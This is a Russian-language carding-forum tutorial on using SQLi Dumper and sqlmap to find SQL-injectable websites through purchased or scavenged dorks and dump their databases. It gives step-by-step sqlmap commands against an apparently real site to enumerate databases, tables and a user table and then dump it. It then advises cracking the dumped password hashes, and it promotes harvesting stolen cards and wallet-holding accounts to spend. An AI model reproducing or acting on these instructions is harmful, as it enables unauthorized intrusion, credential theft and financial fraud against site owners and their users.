Новости

SQLi Dumper & SQL Map

Желаете понять детальней что есть кардинг и каким способом для вас данная информация поможет в жизни? Если все так значит без колебаний обращайтесь на форум кардинг в каковом для вас найдется анонсы и обзоры из окружения кардига, а еще увеличите собственные знания в данной сфере.

SQLi Dumper & SQL Map
Приветствую, расскажу о SQLi Dumper и SQL Map.
Те, кто внимательно читал мою статью про Havij догадываются о чем будет идти речь. Если нет, то это два хороших инструмента кардера и хакера.
Вот так выглядит SQLi Dumper
Изображение
Тут мы видим наши дорки, которые вы купили или откопали где-то на шару
Для начала сканирования нажимаем в верхнем правом углу Start Scanner и начинается поиск сайтов, это должно работать нормально если вы все правильно вставили. Там есть вкладка, которая называется Exploitable куда нам нужно войти после того как закончили сканирование и выбираем там Start Exploiter в правом верхнем углу. После того как закончили с эсплойтером идем во вкладку Injectable и нажимаем Start Analyzer в верхнем правом углу, после того как проанализировали клацаем правой кнопкой мыши по ссылке и выбираем Go To Dumper.
Изображение
Затем произойдет магия сама по себе... :)/>
Нажимаем на базе данных и нажимаем Get Tables
Изображение
Прогрузились наши таблицы, у меня выпало 31, выбираем нужную нам и нажимаем Get Colums
Изображение
Случится другой фокус и программа дала нам 34 колонки, теперь чтобы получить и сохранить необходимую нам информацию на наш кампутер, выбираем нужную нам колонку и выбираем Dump Data
Изображение
Круто?

Идем дальше, успеваете?
SQL Map
Идем в командную строку и в раздел SQL Map
Изображение
Вводим эту команду
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs
Проявите немного терпения пока процесс закончится
Изображение
Теперь, чтобы получить таблицы для той базы данных вводим эту команду
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 --tables
Изображение
Должны отобразиться таблицы, выбираем ту, которая нас интересует и колонки которой мы хотим получить и вводим эту команду
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 -T tblusers --columns
Изображение
Должны появиться колонки. Теперь чтобы сдампить(получить/извлечь) нужную нам инфу с колонок пишем эту комманду
SQLi Dumper & SQL Map
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 -T tblusers --dump
Изображение
Вот эта инфа, это криптопароль, я думаю sha1 и советую заюзать HashKiller для декрипта
Для поиска админки python скрипт:
ССЫЛКА

Изображение
Затем нажимаем Enter и должен пойти поиск специфической директории
Изображение
Все, пошел процес сканирования

Выглядит все сложно и сыро, понимаю :)/>
Но стоит немножечко посидеть и вникнуть в это все, так сразу все написанное выше покажется вам легким и понятным. Так же не забывайте, что при правильном подборе дорков можно добывать картон, аккаунты к разным сайтам в которых есть внутренние кошельки и траааааааатить их :)/>
Всем удачи и экспериментов :)/>
Специально для ссс.mn

<< Вернуться на предыдущую страницу

Сделано кардинг гифтов 2019